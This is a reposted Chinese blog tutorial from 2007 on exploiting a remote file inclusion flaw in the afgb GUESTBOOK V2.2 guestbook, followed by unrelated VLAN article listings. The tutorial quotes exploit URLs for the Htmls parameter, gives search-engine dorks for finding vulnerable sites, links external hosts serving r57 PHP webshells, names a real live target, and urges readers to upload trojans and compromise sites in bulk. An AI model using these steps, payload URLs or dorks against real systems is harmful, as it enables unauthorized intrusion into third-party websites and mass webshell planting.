菜鸟玩远程包含漏洞--实战篇

最新推荐文章于 2025-04-12 15:50:44 发布
最新推荐文章于 2025-04-12 15:50:44 发布
阅读量236 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/godjiahui/archive/2007/09/07/885206.html
版权
在本文你可以学到:
1、    怎样利用已知漏洞
2、    远程包含漏洞入侵整个过程
一、    菜鸟的感慨:
    唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解!
    一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机会吧,让我们尝尝坠入洞中的滋味吧”可是却只剩下那让人没有人理睬的声音在遥远的天空回荡。
    说起那些做教程的高手,他们让我们我们只是看到他入侵或提权过程,却不给我们他们找漏洞的整个过程,我们看完了他的教程,却不知道何去何从。
跟着他们的步骤入侵同一个网站吧,网站不是关掉了,就是漏洞已经补上。。。。更有甚者,在网站漏洞的页面挂上木马,可耻啊!让我们沦为他们的肉鸡,让我们在担惊受怕中徘徊。做黑客,怎么可以无耻到这种地步?上天啊,求求你给我一个可以机会吧,我们用渴望的眼神望着上帝,希望他给我们提示。。。。于是。。。。《黑客手册下凡》
二 、菜鸟找漏洞
        作为菜鸟的我不甘这样忍受高手的蹂躏,我要冲破束缚,翱翔在shell 的天空,这里我非常感谢我亲爱的google、百度、以及其它搜索引擎,是他们给了我们希望,给我们莫大的帮助,今天我们就让我们的 google 大和百度大叔闪亮登场,开始找洞洞的旅程吧!
    首先在百度里输入“远程包含漏洞原理”这句关键字一搜,呵呵!要教程有教程,要文章有文章,我就不在多说了,2007年的第一期的《黑手》有详细的介绍,这里我简要说一下,其实远程包含漏洞就是 程序文件中的变量过滤不严可以远程包含并执行我们的php文件。
    至于找程序的漏洞,对于我们菜鸟来说是比较高深的,但是,利用已经知道的漏洞也不行吗?那也太菜了,继续操作。。。。。。多搜索一些教程和文章来看看,发现一打把介绍的文章和利用的利用方法,可是都没有提示我找到漏洞站点的思路,很多都找不到利用的站点,无意中看了个教程,做的是入侵台湾留言本的步骤,从教程上得到信息有:漏洞出现的页面一个留言本的add.php 没有过滤的变量Htmls,既然漏洞出来了,我就要仔细的研究了。
在 google里输入“add.php?Htmls=”作为关键字进行搜索, 得到下图 1
 
a2007-9-3-734ga1.jpg500)this.width=500" border=0>
                                                         图1
进入博客找到我要的信息:
AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
2006-10-13 08:19:54
大中小
#        afgb GUESTBOOK V2.2                          #
#      Htmls Remote File Include Vulnerability        #
#                      Turkish Hacker\'s              #
#      Discovered By : mdX                            #
#                                                      #
#------------------------------------------------------
#              Cyber-Warrior TIM                      #
#        Ay ve  YIldIzlar Geceye YakISIr...          #
#        the moon and the stars suit the night        #
########################################################
#
# Class : REmote
########################################################
#            File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include \"$Htmls\";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
#                        _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################
download link :http://www.afgb.to/
# milw0rm.com [2006-10-12]
现在我知道了含有漏洞文件的程序名称版本号afgb GUESTBOOK V2.2,而且让我的得很有用的站点http://www.milw0rm.com/exploits里面公布很多的漏洞如图二,希望菜鸟们到里面找到有用信息通过google、百度等搜索引擎快速拿站抓鸡吧
a2007-9-3-580ga2.jpg500)this.width=500" border=0>
                                 图2
三.顺利的拿下一批webshell
通过前面得到的信息和google等搜索引擎的配合得到漏洞的站点,这次我们在google中搜索关键字“afgb GUESTBOOK V2.2”,如图3
a2007-9-3-621ga3.jpg500)this.width=500" border=0>
                                                                                 图3
找到漏洞站点了,进去逛逛吧!来到漏洞站点http://bookgb1.xoops.twpopo.com/,如图4。
a2007-9-3-360ga4.jpg500)this.width=500" border=0>
                                        图4
至于这个程序的漏洞利用方法,这里要用到一个php木马的地址我知道的有三个:(http://www.sagi.net.cn/php.txt国内的)(http://hack-viyu.h16.ru/shell/r57shell.txt国外的r57shell)(http://pang0.by.ru/shall/pang057.zz也是r57的 ),提示注意图4和图五浏览器的区别!
a2007-9-3-371ga5.jpg500)this.width=500" border=0>
                                        图5
按照图5地址栏所示,电击浏览器的转到按钮,或直接按enter键,出现如图6 的信息
a2007-9-3-797ga6.jpg500)this.width=500" border=0>
                                图6
这样就成功一半了,找可以写的目录上传我们的php木马
看下图7中其中r表示有读的权限,w 表示有写的权限,x 表示有执行的权限
a2007-9-3-112ga7.jpg500)this.width=500" border=0>
      图7
找到一个可以写的路径到我们的上传的地方上传我们的木马,上传的地方如图8:
                          图8
a2007-9-3-784ga8.jpg500)this.width=500" border=0> 
上传成功后运行我的木马,如图9。

a2007-9-3-784ga81.jpg500)this.width=500" border=0>
下面的图10、图11、图12、图13是几个具有漏洞的站点,大家可以测试一下。
a2007-9-3-738a10.jpg500)this.width=500" border=0>
                                      图10
a2007-9-3-140a11.jpg500)this.width=500" border=0>
                                      图11
a2007-9-3-472a12.jpg500)this.width=500" border=0>
                                图12
a2007-9-3-876a13.jpg500)this.width=500" border=0>
                            图13
啊哈!找到了webshell网站,如图14、图15。
a2007-9-3-811a14.jpg500)this.width=500" border=0>
                                图14



a2007-9-3-436a15.jpg500)this.width=500" border=0>
                                图15
四、菜鸟广泛入侵
  入侵本应该到此结束,可是这样不符合我做人的习惯,就象拔草,要把拔要连根拔起,呵呵,废话少说,先看了看这个留言本,并且把它下载到本地进行了分析,找特殊的页面在google 里搜索了 一下,效果并不理想 。
我把刚才得到的几个网站分析了下,共同点是,在首页的底部有版权信息为:程式设计:过往云烟 [V2.2] ,看来以这个为关键字得到一大批有漏洞的站点,接着我用  程式设计:过往云烟 [V2.1]也发现几个有漏洞的网站
有1600多项
随便试一个(截图 )图16、图17、图18、图19。
a2007-9-3-965a16.jpg500)this.width=500" border=0>
                                                         图16
a2007-9-3-884a17.jpg500)this.width=500" border=0>
                                                            图17
a2007-9-3-150a18.jpg500)this.width=500" border=0>
                                                               图18
五 菜鸟总结:
  这次入侵实际没有用到什么新鲜的技术,都是陈旧的,通过这篇文章我知识想告诉大家,人家发现了漏洞,我们就要通过社会工程学把战果扩大,虽然技术简单,但是思路要保持灵活嘛!


转载于:https://www.cnblogs.com/godjiahui/archive/2007/09/07/885206.html

802.1Qvlan
weixin_34023863的博客
06-25 639
今天,温习了一下vlan的知识。以下是转载过来的一篇文章。说得比较透彻 802.1Q VLAN 技术原理 在数据通信和宽带接入设备里,只要涉及到二层技术的,就会遇到VLAN。而且,通常情况下,VLAN在这些设备中是基本功能。所以不管是刚迈进这个行业的新生,还是已经在这个行业打拼了很多年的前辈,都要熟悉这个技术。在论坛上经常看到讨论各种各样的关于VLAN的问题,在工...
VLAN间路由(三种方式介绍与配置)
yangchuang111213的博客
11-06 3899
简单来说,同一个VLAN中的用户间通信就和在一个局域网内一样,同一个VLAN中的广播只有VLAN中的 成员才能听到,而不会传输到其他的VLAN中去,从而控制不必要的广播风暴的产生。当接收到对端设备发送的不带Tag的数据帧时,会添加该端口的PVID,如果PVID在允许通过的VLAN ID列表中,则接收该报文,否则丢弃该报文。此时交换机连接主机和服务器的端口,以及交换机互连的端口都配置为Hybrid类型。交换机连接主机A的端口的PVID是2,连接主机B的端口的PVID是3,连接服务器的端口的PVID是100。
VLAN-802.1Q(accesstrunk
Adelais_Z的博客
04-19 4345
虚拟局域网是一组逻辑上的设备和用户,设备和用户不受物理位置的限制,可以根据功能、应用等因素将它们组织起来,VLAN可以隔离广播域、有效抑制广播风暴 接口类型:accesstrunkhybrid
一篇详解交换机接口类型Access / Trunk / Hybrid接口与端口的区别(内含本地VLAN问题详解)
最新发布
DreamCollector的博客
04-12 1068
一个接口只能属于一个 VLAN;只能发送/接收 Untagged 帧;通常连接终端设备,如 PC、打印机等。可允许多个 VLAN 通行;用于交换机交换机、路由器等连接;支持 Tagged 帧,部分情况支持 Untagged(Native VLAN)。可属于多个 VLAN,允许接收和发送多个 VLAN 的 Tagged 与 Untagged 报文;适用于用户设备 + 多 VLAN 并存的混合环境。接口类型支持 VLAN 数量是否加/去 Tag接收 Untagged。
交换机三种端口模式AccessHybridTrunk
Linux知识积累
07-11 4132
以太网端口有 3种链路类型:accesstrunk、hybirdAccess类型端口:只能属于1VLAN,一般用于连接计算机端口;Trunk类型端口:可以允许多个VL...
VLAN三个接口模式
weixin_64097979的博客
09-22 1592
2.接收数据时,若该帧不带vlan标签,用接口PVID数值作为标签,给数据帧打上标签,接收数据帧时如果携带vlan标签,判断是否与本接口一致,如果一致,则接受数据帧,如果不一致,则丢弃标签。3.接收数据帧,检查数据帧中的 vlan标签,判断是否允许这个vlan标签通过,如果允许则接收数据帧,如果不允许则丢弃数据。2.同时可以属于多个vlan,同一时间可以传递多个vlan的数据帧。2.可以像Access 接口一样,发送出去的数据不携带标签。可以像Trunk 接口一样,发送出去的数据携带标签。
802.1q VLAN
weixin_34256074的博客
04-07 664
VLAN(Virtual Local Area Network),是一种通过将局域网内的设备逻辑地而不是物理地划分成一个个网段从而实现虚拟工作组的技术。 以一个网络接口为主设备,可以创建多个虚拟网络接口,称为子接口802.1q子接口),主设备称为主接口或父接口;每个子接口对应一个vlan id;当主接口接收报文时,如果为802.1q报文,则根据vlan id将报文分发的对应的子接口;当子接口需要...
VLAN的端口分三种类型
hugh9268的博客
08-18 1万+
VLAN的端口分三种类型:Aces端口、 Trunk端口、 Hybrid端口。 Access端口一般在连接PC时使用,发送不带标签的报文。一个 Access Port只属于一个 VLAN。缺省所有端口都包含在 VLANI中,且都是 Access端口。 Access 3端口的PVID 值和它所属的VLAN相关。 Trunk端口一般用于交换机级联端口传递多组VLAN信息时使用。一个 Trunk Port可以 属于多个VLANTrunk端口的PVID与所属VLAN无关,缺省值为1Hybrid i端口是混
二层协议基本总结(二)--vlan总结
liboyang990814的博客
04-19 2609
vlan基础概念 vlan技术可以将一个物理局域网在逻辑上划分成多个广播域,实质时隔离广播域 冲突域: 连接在同一导线上的所有工作站的集合,,或者说时同一我物理网段上所有结点的集合或以太网上竞争同意贷款的节点集合。集线器连接的所有节点都可以被认为是2在同一冲突域内,它不会划分冲突域。而二层设备(网桥,交换机)三层设备(路由器)都可以划分冲突域,冲突域是基于第一层 物理层 广播域: 网络中某一设备同...
VLAN端口类型详解——Huawei、Cisco
2401_84008965的博客
04-21 591
pc1所发出的数据,由inter0/1所在的pvid vlan10封装vlan10的标记后送入交换机交换机发现inter e0/2允许vlan 10的数据通过,于是数据被转发到inter e0/2上,由于inter e0/2上vlan 10是untagged的,于是交换机此时去除数据包上vlan10的标记,以普通包的形式发给pc2,此时pc1->p2走的是vlan10。Hybrid类型的端口可以允许多个VLAN通过,可以接收和发送多个VLAN的报文,可以用于交换机之间连接,也可以用于连接用户的计算机。
网络Trunk端口配置
Linux运维老纪的博客
07-06 4949
Trunk端口一般用于交换机之间连接的端口,可以接收和发送多个VLAN的报文。 当Trunk端口收到数据帧时,如果该帧不包含802.1Q的VLAN标签,将打上Trunk端口的PVID;如包含,则不改变.本章教大家如何配置trunk链路。
Vlan通信原理
zhuying6666的博客
02-16 3912
VLAN工作原理(VLAN通信原理)详解 VLAN工作原理即VLAN通信原理 1vlan基本通信原理 为了提高处理效率,交换机内部的数据帧一律都带有VLAN Tag,以统一方式处理。当一个数据帧进入交换机接口时,如果没有带VLAN Tag,且该接口上配置了PVID(Port Default VLAN ID),那么,该数据帧就会被标记上接口的PVID。如果数据帧已经带有VLAN Tag,那么,
802.1Q VLAN协议802.1P协议的实现
网络精英-服务日
02-24 2712
802.1Q VLAN协议802.1P协议的实现2004-03-05       打印自: 蓝色技术频道网络技术门户地址: http://www.17lan.com/article.php/506802.1Q VLAN协议802.1P协议的实现本文主要介绍了802.1VLAN协议在以太网交换机中的实现,以及
VLAN接口类型
ShaShark0 的博客
04-13 4728
VLAN接口类型 1.Access 接入端口 用于和不能识别Tag 的用户终端相连,或者不需要区分不同VLAN成员时使用 Access端口是交换机上用来连接用户主机的端口,它只能连接接入链路,并且只能允许唯一的VLAN ID通过本端口。 Access端口收发数据帧的规则如下: 如果该端口收到对端设备发送的帧是untagged(不带VLAN标签),交换机将强制加上该端口的PVID。如果该端口收到对端设备发送的帧是tagged(带VLAN标签),交换机会检查该标签内的VLAN ID。当VLAN I.
香橙派配置 VLAN (802.1q)
穷人小水滴的博客
01-24 1505
VLAN 是一种网络虚拟化技术, 可以简单理解为网络的分身术或精神分裂术.窝家的局域网稍微有点复杂, 有 2 个网段. 想让香橙派能够同时直接访问这 2 个网段, 但是香橙派只有一个网口, 怎么办 ? VLAN !VLAN (虚拟局域网) 是一种网络 虚拟化 技术. 类似于虚拟机技术, 可以把一台物理计算机 (CPU, 内存, 硬盘等资源) 划分成多个虚拟机 (逻辑计算机). VLAN 可以把一个物理网络 (交换机, 网线, 网口等) 划分成多个互相隔离的逻辑网络.
vlan- 接口类型
Fe_smoothly的博客
01-30 1211
1、划分的接口类型access,trunk,hybrid应用场景2、接口类型的收方向和发送方向的判断原理3、链路聚合(eth-trunk)(1)、不同类型的接口适用于不同的场景:•Access类型的接口主要用来连接用户主机,一般用于接入链路,且接入链路上通过的帧为不带Tag的以太网帧。如果Access接口配置了缺省VLAN,则在该报文上加上Tag标记,并将Tag中的VID字段的值设置为接口所属的缺省VLAN编号,此时接入链路上允许与缺省VLAN Tag匹配的以太网帧通过。
谈谈交换机三种端口模式AccessHybridTrunk
weixin_34414196的博客
01-15 842
  以太网端口有 3种链路类型:accesstrunk、hybird   Access类型端口:只能属于1VLAN,一般用于连接计算机端口;   Trunk类型端口:可以允许多个VLAN通过,可以接收和发送多个VLAN 报文,   一般用于交换机交换机相关的接口。   Hybrid类型端口:可以允许多个VLAN通过,可以接收和发送多个VLAN 报文,   可以用于交换机的间连接也可以用于连接...
802.1Q VLAN 简介
热门推荐
Hayden的技术博客
07-07 2万+
(一)vlan原理 首先说下802.1q协议(也叫dot1q),802.1q协议定义了vlan字段的结构和vlan字段在以太网帧中的位置。上一篇文章有介绍以太网帧的格式,传统的以太网数据帧在目的mac地址和源mac地址之后封装的是上层协议的类型字段,如图1-2所示。 其中DA表示目的mac地址,SA表示源mac地址,Type表示报文所属协议类型。 IEEE 802.1q协议规定在目的ma
VLAN三种端口类型!AccessTrunk、Hybird
weixin_42283438的博客
04-15 1万+
​接上一期内容,本期将详细介绍VLAN三种端口类型!在很多学校上课的过程中,发现很多学生未能真正掌握这一技术知识点,所以望读者用心领悟哦! 标签的概念:数据在交换机传输的过程中,会打上tag标签,未打上tag标签的数据属于untag数据; 第一种类型:Access端口类型:(常用在交换机与主机之间连接) 在收数据方向:(1)如果收的是untag数据,会打上此A接口vlan id进行接收,默认是vlan 1,可以修改。(2)如果是tag数据,比较tag数据vlan id与此A接口vlan id是否一
802.1q
03-19
### IEEE 802.1Q VLAN Tagging Protocol Standard IEEE 802.1Q 是支持虚拟局域网(VLAN)的标准协议之一,通常被称为 Dot1q。该标准定义了一种用于以太网帧的 VLAN 标记系统以及交换机和桥接器处理这些标记帧的操作流程[^2]。 #### 协议结构概述 IEEE 802.1Q 的核心功能在于通过在以太网数据帧中插入特定字段来实现 VLAN 标签的功能。这种标签使得网络设备能够识别哪些流量属于哪个 VLAN,并据此执行转发决策。具体来说: - **Tag Header**: 在原始以太网帧头部增加了一个额外的 4 字节字段作为 VLAN 标签头。这四个字节包含了以下部分: - **Priority Code Point (PCP)**: 使用 3 比特表示优先级级别,范围从 0 到 7,主要用于 QoS 控制。 - **Canonical Format Indicator (CFI)**: 这是一个单比特位,在传统以太网环境中设置为零。 - **VLAN Identifier (VID)**: 使用 12 比特标识具体的 VLAN ID,理论上可以支持多达 4096 个不同的 VLAN(编号从 0 至 4095),其中某些特殊值保留给内部用途或管理目的。 #### 数据包处理机制 当一个带有 VLAN tag 的数据包进入支持 IEEE 802.1Q 的交换机时,它会依据此标签决定如何路由或者过滤该数据流。如果目标端口不属于同一 VLAN,则不会传输至其他无关联的物理接口上;反之亦然——只有相同 VLAN 成员之间才允许互相通信除非经过路由器跨网段访问[^1]。 此外,为了简化管理和配置过程并增强互操作性,还引入了一些辅助性的子协议和服务组件比如 GARP(通用属性注册协议)。GARP 可帮助分发有关 VLAN 成员资格的信息到各个连接节点以便动态调整其行为模式而无需频繁手动干预[^3]。 以下是创建带 VLAN TAG 的 Python 示例代码片段展示如何模拟构建这样的 Ethernet Frame: ```python from scapy.all import Ether, Dot1Q, IP, sendp def create_vlan_packet(src_mac="00:aa:bb:cc:dd:ee", dst_mac="ff:ff:ff:ff:ff:ff", vlan_id=100, src_ip="192.168.1.1", dst_ip="192.168.1.2"): ether = Ether(src=src_mac, dst=dst_mac) dot1q = Dot1Q(vlan=vlan_id) ip_layer = IP(src=src_ip, dst=dst_ip) packet = ether / dot1q / ip_layer return packet packet = create_vlan_packet() sendp(packet, iface="eth0") # Replace 'eth0' with your network interface name. ``` 上述脚本利用 Scapy 库生成包含指定源地址、目的地址及所属 VLAN 编号的数据报文并通过选定的网卡发送出去测试实际效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值